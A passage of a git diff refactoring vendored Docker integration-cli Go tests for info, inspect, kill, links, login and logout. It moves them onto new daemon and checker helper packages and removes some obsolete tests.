a/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go @@ -6,7 +6,9 @@ import ( "net" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/daemon" + testdaemon "github.com/docker/docker/internal/test/daemon" "github.com/go-check/check" ) @@ -35,15 +37,15 @@ func (s *DockerSuite) TestInfoEnsureSucceeds(c *check.C) { "Live Restore Enabled:", } - if daemonPlatform == "linux" { + if testEnv.OSType == "linux" { stringsToCheck = append(stringsToCheck, "Init Binary:", "Security Options:", "containerd version:", "runc version:", "init version:") } - if DaemonIsLinux.Condition() { + if DaemonIsLinux() { stringsToCheck = append(stringsToCheck, "Runtimes:", "Default Runtime: runc") } - if experimentalDaemon { + if testEnv.DaemonInfo.ExperimentalBuild { stringsToCheck = append(stringsToCheck, "Experimental: true") } else { stringsToCheck = append(stringsToCheck, "Experimental: false") @@ -70,12 +72,11 @@ func (s *DockerSuite) TestInfoFormat(c *check.C) { func (s *DockerSuite) TestInfoDiscoveryBackend(c *check.C) { testRequires(c, SameHostDaemon, DaemonIsLinux) - d := NewDaemon(c) + d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) discoveryBackend := "consul://consuladdr:consulport/some/path" discoveryAdvertise := "1.1.1.1:2375" - err := d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend), fmt.Sprintf("--cluster-advertise=%s", discoveryAdvertise)) - c.Assert(err, checker.IsNil) - defer d.Stop() + d.Start(c, fmt.Sprintf("--cluster-store=%s", discoveryBackend), fmt.Sprintf("--cluster-advertise=%s", discoveryAdvertise)) + defer d.Stop(c) out, err := d.Cmd("info") c.Assert(err, checker.IsNil) @@ -88,16 +89,16 @@ func (s *DockerSuite) TestInfoDiscoveryBackend(c *check.C) { func (s *DockerSuite) TestInfoDiscoveryInvalidAdvertise(c 
*check.C) { testRequires(c, SameHostDaemon, DaemonIsLinux) - d := NewDaemon(c) + d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) discoveryBackend := "consul://consuladdr:consulport/some/path" // --cluster-advertise with an invalid string is an error - err := d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend), "--cluster-advertise=invalid") - c.Assert(err, checker.Not(checker.IsNil)) + err := d.StartWithError(fmt.Sprintf("--cluster-store=%s", discoveryBackend), "--cluster-advertise=invalid") + c.Assert(err, checker.NotNil) // --cluster-advertise without --cluster-store is also an error - err = d.Start("--cluster-advertise=1.1.1.1:2375") - c.Assert(err, checker.Not(checker.IsNil)) + err = d.StartWithError("--cluster-advertise=1.1.1.1:2375") + c.Assert(err, checker.NotNil) } // TestInfoDiscoveryAdvertiseInterfaceName verifies that a daemon run with `--cluster-advertise` @@ -105,13 +106,12 @@ func (s *DockerSuite) TestInfoDiscoveryInvalidAdvertise(c *check.C) { func (s *DockerSuite) TestInfoDiscoveryAdvertiseInterfaceName(c *check.C) { testRequires(c, SameHostDaemon, Network, DaemonIsLinux) - d := NewDaemon(c) + d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) discoveryBackend := "consul://consuladdr:consulport/some/path" discoveryAdvertise := "eth0" - err := d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend), fmt.Sprintf("--cluster-advertise=%s:2375", discoveryAdvertise)) - c.Assert(err, checker.IsNil) - defer d.Stop() + d.Start(c, fmt.Sprintf("--cluster-store=%s", discoveryBackend), fmt.Sprintf("--cluster-advertise=%s:2375", discoveryAdvertise)) + defer d.Stop(c) iface, err := net.InterfaceByName(discoveryAdvertise) c.Assert(err, checker.IsNil) @@ -130,51 +130,56 @@ func (s *DockerSuite) TestInfoDiscoveryAdvertiseInterfaceName(c *check.C) { func (s *DockerSuite) TestInfoDisplaysRunningContainers(c *check.C) { testRequires(c, DaemonIsLinux) + existing := 
existingContainerStates(c) + dockerCmd(c, "run", "-d", "busybox", "top") out, _ := dockerCmd(c, "info") - c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", 1)) - c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", 1)) - c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", 0)) - c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", 0)) + c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", existing["Containers"]+1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", existing["ContainersRunning"]+1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", existing["ContainersPaused"])) + c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", existing["ContainersStopped"])) } func (s *DockerSuite) TestInfoDisplaysPausedContainers(c *check.C) { testRequires(c, IsPausable) - out, _ := runSleepingContainer(c, "-d") + existing := existingContainerStates(c) + + out := runSleepingContainer(c, "-d") cleanedContainerID := strings.TrimSpace(out) dockerCmd(c, "pause", cleanedContainerID) out, _ = dockerCmd(c, "info") - c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", 1)) - c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", 0)) - c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", 1)) - c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", 0)) + c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", existing["Containers"]+1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", existing["ContainersRunning"])) + c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", existing["ContainersPaused"]+1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", existing["ContainersStopped"])) } func (s *DockerSuite) TestInfoDisplaysStoppedContainers(c *check.C) { testRequires(c, DaemonIsLinux) + existing := existingContainerStates(c) + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") cleanedContainerID := strings.TrimSpace(out) 
dockerCmd(c, "stop", cleanedContainerID) out, _ = dockerCmd(c, "info") - c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", 1)) - c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", 0)) - c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", 0)) - c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", 1)) + c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", existing["Containers"]+1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", existing["ContainersRunning"])) + c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", existing["ContainersPaused"])) + c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", existing["ContainersStopped"]+1)) } func (s *DockerSuite) TestInfoDebug(c *check.C) { testRequires(c, SameHostDaemon, DaemonIsLinux) - d := NewDaemon(c) - err := d.Start("--debug") - c.Assert(err, checker.IsNil) - defer d.Stop() + d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) + d.Start(c, "--debug") + defer d.Stop(c) out, err := d.Cmd("--debug", "info") c.Assert(err, checker.IsNil) @@ -193,10 +198,9 @@ func (s *DockerSuite) TestInsecureRegistries(c *check.C) { registryCIDR := "192.168.1.0/24" registryHost := "insecurehost.com:5000" - d := NewDaemon(c) - err := d.Start("--insecure-registry="+registryCIDR, "--insecure-registry="+registryHost) - c.Assert(err, checker.IsNil) - defer d.Stop() + d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) + d.Start(c, "--insecure-registry="+registryCIDR, "--insecure-registry="+registryHost) + defer d.Stop(c) out, err := d.Cmd("info") c.Assert(err, checker.IsNil) @@ -211,8 +215,7 @@ func (s *DockerDaemonSuite) TestRegistryMirrors(c *check.C) { registryMirror1 := "https://192.168.1.2" registryMirror2 := "http://registry.mirror.com:5000" - err := s.d.Start("--registry-mirror="+registryMirror1, "--registry-mirror="+registryMirror2) - c.Assert(err, checker.IsNil) + 
s.d.Start(c, "--registry-mirror="+registryMirror1, "--registry-mirror="+registryMirror2) out, err := s.d.Cmd("info") c.Assert(err, checker.IsNil) @@ -221,14 +224,15 @@ func (s *DockerDaemonSuite) TestRegistryMirrors(c *check.C) { c.Assert(out, checker.Contains, fmt.Sprintf(" %s", registryMirror2)) } -// Test case for #24392 -func (s *DockerDaemonSuite) TestInfoLabels(c *check.C) { - testRequires(c, SameHostDaemon, DaemonIsLinux) - - err := s.d.Start("--label", `test.empty=`, "--label", `test.empty=`, "--label", `test.label="1"`, "--label", `test.label="2"`) - c.Assert(err, checker.IsNil) - - out, err := s.d.Cmd("info") +func existingContainerStates(c *check.C) map[string]int { + out, _ := dockerCmd(c, "info", "--format", "{{json .}}") + var m map[string]interface{} + err := json.Unmarshal([]byte(out), &m) c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, "WARNING: labels with duplicate keys and conflicting values have been deprecated") + res := map[string]int{} + res["Containers"] = int(m["Containers"].(float64)) + res["ContainersRunning"] = int(m["ContainersRunning"].(float64)) + res["ContainersPaused"] = int(m["ContainersPaused"].(float64)) + res["ContainersStopped"] = int(m["ContainersStopped"].(float64)) + return res } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go index b9323060dd..d55c05c4a5 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go @@ -3,7 +3,7 @@ package main import ( - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go index 32ed28afe1..d027c44775 
100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go @@ -4,15 +4,15 @@ import ( "encoding/json" "fmt" "os" - "os/exec" "strconv" "strings" "time" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/container" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" + "gotest.tools/icmd" ) func checkValidGraphDriver(c *check.C, name string) { @@ -53,10 +53,7 @@ func (s *DockerSuite) TestInspectDefault(c *check.C) { } func (s *DockerSuite) TestInspectStatus(c *check.C) { - if daemonPlatform != "windows" { - defer unpauseAllContainers() - } - out, _ := runSleepingContainer(c, "-d") + out := runSleepingContainer(c, "-d") out = strings.TrimSpace(out) inspectOut := inspectField(c, out, "State.Status") @@ -64,7 +61,7 @@ func (s *DockerSuite) TestInspectStatus(c *check.C) { // Windows does not support pause/unpause on Windows Server Containers. 
// (RS1 does for Hyper-V Containers, but production CI is not setup for that) - if daemonPlatform != "windows" { + if testEnv.OSType != "windows" { dockerCmd(c, "pause", out) inspectOut = inspectField(c, out, "State.Status") c.Assert(inspectOut, checker.Equals, "paused") @@ -142,11 +139,12 @@ func (s *DockerSuite) TestInspectImageFilterInt(c *check.C) { } func (s *DockerSuite) TestInspectContainerFilterInt(c *check.C) { - runCmd := exec.Command(dockerBinary, "run", "-i", "-a", "stdin", "busybox", "cat") - runCmd.Stdin = strings.NewReader("blahblah") - out, _, _, err := runCommandWithStdoutStderr(runCmd) - c.Assert(err, checker.IsNil, check.Commentf("failed to run container: %v, output: %q", err, out)) - + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "run", "-i", "-a", "stdin", "busybox", "cat"}, + Stdin: strings.NewReader("blahblah"), + }) + result.Assert(c, icmd.Success) + out := result.Stdout() id := strings.TrimSpace(out) out = inspectField(c, id, "State.ExitCode") @@ -157,9 +155,9 @@ func (s *DockerSuite) TestInspectContainerFilterInt(c *check.C) { //now get the exit code to verify formatStr := fmt.Sprintf("--format={{eq .State.ExitCode %d}}", exitCode) out, _ = dockerCmd(c, "inspect", formatStr, id) - result, err := strconv.ParseBool(strings.TrimSuffix(out, "\n")) + inspectResult, err := strconv.ParseBool(strings.TrimSuffix(out, "\n")) c.Assert(err, checker.IsNil) - c.Assert(result, checker.Equals, true) + c.Assert(inspectResult, checker.Equals, true) } func (s *DockerSuite) TestInspectImageGraphDriver(c *check.C) { @@ -208,12 +206,8 @@ func (s *DockerSuite) TestInspectContainerGraphDriver(c *check.C) { func (s *DockerSuite) TestInspectBindMountPoint(c *check.C) { modifier := ",z" prefix, slash := getPrefixAndSlashFromDaemonPlatform() - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { modifier = "" - // TODO Windows: Temporary check - remove once TP5 support is dropped - if windowsDaemonKV < 14350 { - c.Skip("Needs later 
Windows build for RO volumes") - } // Linux creates the host directory if it doesn't exist. Windows does not. os.Mkdir(`c:\data`, os.ModeDir) } @@ -235,7 +229,7 @@ func (s *DockerSuite) TestInspectBindMountPoint(c *check.C) { c.Assert(m.Driver, checker.Equals, "") c.Assert(m.Source, checker.Equals, prefix+slash+"data") c.Assert(m.Destination, checker.Equals, prefix+slash+"data") - if daemonPlatform != "windows" { // Windows does not set mode + if testEnv.OSType != "windows" { // Windows does not set mode c.Assert(m.Mode, checker.Equals, "ro"+modifier) } c.Assert(m.RW, checker.Equals, false) @@ -308,7 +302,7 @@ func (s *DockerSuite) TestInspectNoSizeFlagContainer(c *check.C) { formatStr := "--format={{.SizeRw}},{{.SizeRootFs}}" out, _ := dockerCmd(c, "inspect", "--type=container", formatStr, "busybox") - c.Assert(strings.TrimSpace(out), check.Equals, ",", check.Commentf("Exepcted not to display size info: %s", out)) + c.Assert(strings.TrimSpace(out), check.Equals, ",", check.Commentf("Expected not to display size info: %s", out)) } func (s *DockerSuite) TestInspectSizeFlagContainer(c *check.C) { @@ -356,14 +350,22 @@ func (s *DockerSuite) TestInspectByPrefix(c *check.C) { } func (s *DockerSuite) TestInspectStopWhenNotFound(c *check.C) { - runSleepingContainer(c, "--name=busybox", "-d") - runSleepingContainer(c, "--name=not-shown", "-d") - out, _, err := dockerCmdWithError("inspect", "--type=container", "--format='{{.Name}}'", "busybox", "missing", "not-shown") - - c.Assert(err, checker.Not(check.IsNil)) - c.Assert(out, checker.Contains, "busybox") - c.Assert(out, checker.Not(checker.Contains), "not-shown") - c.Assert(out, checker.Contains, "Error: No such container: missing") + runSleepingContainer(c, "--name=busybox1", "-d") + runSleepingContainer(c, "--name=busybox2", "-d") + result := dockerCmdWithResult("inspect", "--type=container", "--format='{{.Name}}'", "busybox1", "busybox2", "missing") + + c.Assert(result.Error, checker.Not(check.IsNil)) + 
c.Assert(result.Stdout(), checker.Contains, "busybox1") + c.Assert(result.Stdout(), checker.Contains, "busybox2") + c.Assert(result.Stderr(), checker.Contains, "Error: No such container: missing") + + // test inspect would not fast fail + result = dockerCmdWithResult("inspect", "--type=container", "--format='{{.Name}}'", "missing", "busybox1", "busybox2") + + c.Assert(result.Error, checker.Not(check.IsNil)) + c.Assert(result.Stdout(), checker.Contains, "busybox1") + c.Assert(result.Stdout(), checker.Contains, "busybox2") + c.Assert(result.Stderr(), checker.Contains, "Error: No such container: missing") } func (s *DockerSuite) TestInspectHistory(c *check.C) { @@ -456,11 +458,3 @@ func (s *DockerSuite) TestInspectUnknownObject(c *check.C) { c.Assert(out, checker.Contains, "Error: No such object: foobar") c.Assert(err.Error(), checker.Contains, "Error: No such object: foobar") } - -func (s *DockerSuite) TestInpectInvalidReference(c *check.C) { - // This test should work on both Windows and Linux - out, _, err := dockerCmdWithError("inspect", "FooBar") - c.Assert(err, checker.NotNil) - c.Assert(out, checker.Contains, "Error: No such object: FooBar") - c.Assert(err.Error(), checker.Contains, "Error: No such object: FooBar") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go deleted file mode 100644 index 43164801d4..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go +++ /dev/null @@ -1,134 +0,0 @@ -package main - -import ( - "fmt" - "net/http" - "strings" - "time" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestKillContainer(c *check.C) { - out, _ := runSleepingContainer(c, "-d") - cleanedContainerID := strings.TrimSpace(out) - c.Assert(waitRun(cleanedContainerID), check.IsNil) - - dockerCmd(c, "kill", cleanedContainerID) - 
c.Assert(waitExited(cleanedContainerID, 10*time.Second), check.IsNil) - - out, _ = dockerCmd(c, "ps", "-q") - c.Assert(out, checker.Not(checker.Contains), cleanedContainerID, check.Commentf("killed container is still running")) - -} - -func (s *DockerSuite) TestKillOffStoppedContainer(c *check.C) { - out, _ := runSleepingContainer(c, "-d") - cleanedContainerID := strings.TrimSpace(out) - - dockerCmd(c, "stop", cleanedContainerID) - c.Assert(waitExited(cleanedContainerID, 10*time.Second), check.IsNil) - - _, _, err := dockerCmdWithError("kill", "-s", "30", cleanedContainerID) - c.Assert(err, check.Not(check.IsNil), check.Commentf("Container %s is not running", cleanedContainerID)) -} - -func (s *DockerSuite) TestKillDifferentUserContainer(c *check.C) { - // TODO Windows: Windows does not yet support -u (Feb 2016). - testRequires(c, DaemonIsLinux) - out, _ := dockerCmd(c, "run", "-u", "daemon", "-d", "busybox", "top") - cleanedContainerID := strings.TrimSpace(out) - c.Assert(waitRun(cleanedContainerID), check.IsNil) - - dockerCmd(c, "kill", cleanedContainerID) - c.Assert(waitExited(cleanedContainerID, 10*time.Second), check.IsNil) - - out, _ = dockerCmd(c, "ps", "-q") - c.Assert(out, checker.Not(checker.Contains), cleanedContainerID, check.Commentf("killed container is still running")) - -} - -// regression test about correct signal parsing see #13665 -func (s *DockerSuite) TestKillWithSignal(c *check.C) { - // Cannot port to Windows - does not support signals in the same way Linux does - testRequires(c, DaemonIsLinux) - out, _ := dockerCmd(c, "run", "-d", "busybox", "top") - cid := strings.TrimSpace(out) - c.Assert(waitRun(cid), check.IsNil) - - dockerCmd(c, "kill", "-s", "SIGWINCH", cid) - time.Sleep(250 * time.Millisecond) - - running := inspectField(c, cid, "State.Running") - - c.Assert(running, checker.Equals, "true", check.Commentf("Container should be in running state after SIGWINCH")) -} - -func (s *DockerSuite) 
TestKillWithStopSignalWithSameSignalShouldDisableRestartPolicy(c *check.C) { - // Cannot port to Windows - does not support signals int the same way as Linux does - testRequires(c, DaemonIsLinux) - out, _ := dockerCmd(c, "run", "-d", "--stop-signal=TERM", "--restart=always", "busybox", "top") - cid := strings.TrimSpace(out) - c.Assert(waitRun(cid), check.IsNil) - - // Let docker send a TERM signal to the container - // It will kill the process and disable the restart policy - dockerCmd(c, "kill", "-s", "TERM", cid) - c.Assert(waitExited(cid, 10*time.Second), check.IsNil) - - out, _ = dockerCmd(c, "ps", "-q") - c.Assert(out, checker.Not(checker.Contains), cid, check.Commentf("killed container is still running")) -} - -func (s *DockerSuite) TestKillWithStopSignalWithDifferentSignalShouldKeepRestartPolicy(c *check.C) { - // Cannot port to Windows - does not support signals int the same way as Linux does - testRequires(c, DaemonIsLinux) - out, _ := dockerCmd(c, "run", "-d", "--stop-signal=CONT", "--restart=always", "busybox", "top") - cid := strings.TrimSpace(out) - c.Assert(waitRun(cid), check.IsNil) - - // Let docker send a TERM signal to the container - // It will kill the process, but not disable the restart policy - dockerCmd(c, "kill", "-s", "TERM", cid) - c.Assert(waitRestart(cid, 10*time.Second), check.IsNil) - - // Restart policy should still be in place, so it should be still running - c.Assert(waitRun(cid), check.IsNil) -} - -// FIXME(vdemeester) should be a unit test -func (s *DockerSuite) TestKillWithInvalidSignal(c *check.C) { - out, _ := runSleepingContainer(c, "-d") - cid := strings.TrimSpace(out) - c.Assert(waitRun(cid), check.IsNil) - - out, _, err := dockerCmdWithError("kill", "-s", "0", cid) - c.Assert(err, check.NotNil) - c.Assert(out, checker.Contains, "Invalid signal: 0", check.Commentf("Kill with an invalid signal didn't error out correctly")) - - running := inspectField(c, cid, "State.Running") - c.Assert(running, checker.Equals, "true", 
check.Commentf("Container should be in running state after an invalid signal")) - - out, _ = runSleepingContainer(c, "-d") - cid = strings.TrimSpace(out) - c.Assert(waitRun(cid), check.IsNil) - - out, _, err = dockerCmdWithError("kill", "-s", "SIG42", cid) - c.Assert(err, check.NotNil) - c.Assert(out, checker.Contains, "Invalid signal: SIG42", check.Commentf("Kill with an invalid signal error out correctly")) - - running = inspectField(c, cid, "State.Running") - c.Assert(running, checker.Equals, "true", check.Commentf("Container should be in running state after an invalid signal")) - -} - -func (s *DockerSuite) TestKillStoppedContainerAPIPre120(c *check.C) { - testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later - runSleepingContainer(c, "--name", "docker-kill-test-api", "-d") - dockerCmd(c, "stop", "docker-kill-test-api") - - status, _, err := sockRequest("POST", fmt.Sprintf("/v1.19/containers/%s/kill", "docker-kill-test-api"), nil) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusNoContent) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go index a5872d9e0c..17b25d7994 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go @@ -4,9 +4,10 @@ import ( "encoding/json" "fmt" "regexp" + "sort" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/docker/docker/runconfig" "github.com/go-check/check" ) @@ -27,7 +28,9 @@ func (s *DockerSuite) TestLinksInvalidContainerTarget(c *check.C) { // an invalid container target should produce an error c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) // an invalid container target should produce an error - c.Assert(out, checker.Contains, "Could not get container") + // note: convert the 
output to lowercase first as the error string + // capitalization was changed after API version 1.32 + c.Assert(strings.ToLower(out), checker.Contains, "could not get container") } func (s *DockerSuite) TestLinksPingLinkedContainers(c *check.C) { @@ -89,40 +92,41 @@ func (s *DockerSuite) TestLinksPingLinkedContainersAfterRename(c *check.C) { func (s *DockerSuite) TestLinksInspectLinksStarted(c *check.C) { testRequires(c, DaemonIsLinux) - var ( - expected = map[string]struct{}{"/container1:/testinspectlink/alias1": {}, "/container2:/testinspectlink/alias2": {}} - result []string - ) dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top") dockerCmd(c, "run", "-d", "--name", "container2", "busybox", "top") dockerCmd(c, "run", "-d", "--name", "testinspectlink", "--link", "container1:alias1", "--link", "container2:alias2", "busybox", "top") links := inspectFieldJSON(c, "testinspectlink", "HostConfig.Links") + var result []string err := json.Unmarshal([]byte(links), &result) c.Assert(err, checker.IsNil) - output := convertSliceOfStringsToMap(result) - - c.Assert(output, checker.DeepEquals, expected) + var expected = []string{ + "/container1:/testinspectlink/alias1", + "/container2:/testinspectlink/alias2", + } + sort.Strings(result) + c.Assert(result, checker.DeepEquals, expected) } func (s *DockerSuite) TestLinksInspectLinksStopped(c *check.C) { testRequires(c, DaemonIsLinux) - var ( - expected = map[string]struct{}{"/container1:/testinspectlink/alias1": {}, "/container2:/testinspectlink/alias2": {}} - result []string - ) + dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top") dockerCmd(c, "run", "-d", "--name", "container2", "busybox", "top") dockerCmd(c, "run", "-d", "--name", "testinspectlink", "--link", "container1:alias1", "--link", "container2:alias2", "busybox", "true") links := inspectFieldJSON(c, "testinspectlink", "HostConfig.Links") + var result []string err := json.Unmarshal([]byte(links), &result) c.Assert(err, checker.IsNil) - 
output := convertSliceOfStringsToMap(result) - - c.Assert(output, checker.DeepEquals, expected) + var expected = []string{ + "/container1:/testinspectlink/alias1", + "/container2:/testinspectlink/alias2", + } + sort.Strings(result) + c.Assert(result, checker.DeepEquals, expected) } func (s *DockerSuite) TestLinksNotStartedParentNotFail(c *check.C) { @@ -145,11 +149,8 @@ func (s *DockerSuite) TestLinksHostsFilesInject(c *check.C) { c.Assert(waitRun(idTwo), checker.IsNil) - contentOne, err := readContainerFileWithExec(idOne, "/etc/hosts") - c.Assert(err, checker.IsNil, check.Commentf("contentOne: %s", string(contentOne))) - - contentTwo, err := readContainerFileWithExec(idTwo, "/etc/hosts") - c.Assert(err, checker.IsNil, check.Commentf("contentTwo: %s", string(contentTwo))) + readContainerFileWithExec(c, idOne, "/etc/hosts") + contentTwo := readContainerFileWithExec(c, idTwo, "/etc/hosts") // Host is not present in updated hosts file c.Assert(string(contentTwo), checker.Contains, "onetwo") } @@ -162,8 +163,7 @@ func (s *DockerSuite) TestLinksUpdateOnRestart(c *check.C) { id := strings.TrimSpace(string(out)) realIP := inspectField(c, "one", "NetworkSettings.Networks.bridge.IPAddress") - content, err := readContainerFileWithExec(id, "/etc/hosts") - c.Assert(err, checker.IsNil) + content := readContainerFileWithExec(c, id, "/etc/hosts") getIP := func(hosts []byte, hostname string) string { re := regexp.MustCompile(fmt.Sprintf(`(\S*)\t%s`, regexp.QuoteMeta(hostname))) @@ -180,8 +180,7 @@ func (s *DockerSuite) TestLinksUpdateOnRestart(c *check.C) { dockerCmd(c, "restart", "one") realIP = inspectField(c, "one", "NetworkSettings.Networks.bridge.IPAddress") - content, err = readContainerFileWithExec(id, "/etc/hosts") - c.Assert(err, checker.IsNil, check.Commentf("content: %s", string(content))) + content = readContainerFileWithExec(c, id, "/etc/hosts") ip = getIP(content, "one") c.Assert(ip, checker.Equals, realIP) diff --git 
a/vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go deleted file mode 100644 index 1af927930d..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go +++ /dev/null @@ -1,26 +0,0 @@ -// +build !windows - -package main - -import ( - "io/ioutil" - "os" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestLinksEtcHostsContentMatch(c *check.C) { - // In a _unix file as using Unix specific files, and must be on the - // same host as the daemon. - testRequires(c, SameHostDaemon, NotUserNamespace) - - out, _ := dockerCmd(c, "run", "--net=host", "busybox", "cat", "/etc/hosts") - hosts, err := ioutil.ReadFile("/etc/hosts") - if os.IsNotExist(err) { - c.Skip("/etc/hosts does not exist, skip this test") - } - - c.Assert(out, checker.Equals, string(hosts), check.Commentf("container: %s\n\nhost:%s", out, hosts)) - -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go index 01de75d985..cb261bed85 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go @@ -4,7 +4,7 @@ import ( "bytes" "os/exec" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) @@ -16,29 +16,15 @@ func (s *DockerSuite) TestLoginWithoutTTY(c *check.C) { // run the command and block until it's done err := cmd.Run() - c.Assert(err, checker.NotNil) //"Expected non nil err when loginning in & TTY not available" + c.Assert(err, checker.NotNil) //"Expected non nil err when logging in & TTY not available" } func (s *DockerRegistryAuthHtpasswdSuite) TestLoginToPrivateRegistry(c *check.C) { // wrong credentials - out, 
_, err := dockerCmdWithError("login", "-u", s.reg.username, "-p", "WRONGPASSWORD", privateRegistryURL) + out, _, err := dockerCmdWithError("login", "-u", s.reg.Username(), "-p", "WRONGPASSWORD", privateRegistryURL) c.Assert(err, checker.NotNil, check.Commentf(out)) c.Assert(out, checker.Contains, "401 Unauthorized") // now it's fine - dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) -} - -func (s *DockerRegistryAuthHtpasswdSuite) TestLoginToPrivateRegistryDeprecatedEmailFlag(c *check.C) { - // Test to make sure login still works with the deprecated -e and --email flags - // wrong credentials - out, _, err := dockerCmdWithError("login", "-u", s.reg.username, "-p", "WRONGPASSWORD", "-e", s.reg.email, privateRegistryURL) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "401 Unauthorized") - - // now it's fine - // -e flag - dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, "-e", s.reg.email, privateRegistryURL) - // --email flag - dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, "--email", s.reg.email, privateRegistryURL) + dockerCmd(c, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go index a5f4b108cf..e0752f489c 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go @@ -8,11 +8,13 @@ import ( "os/exec" "path/filepath" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithExternalAuth(c *check.C) { + s.d.StartWithBusybox(c) + osPath := os.Getenv("PATH") defer os.Setenv("PATH", osPath) @@ -28,6 +30,7 @@ func (s 
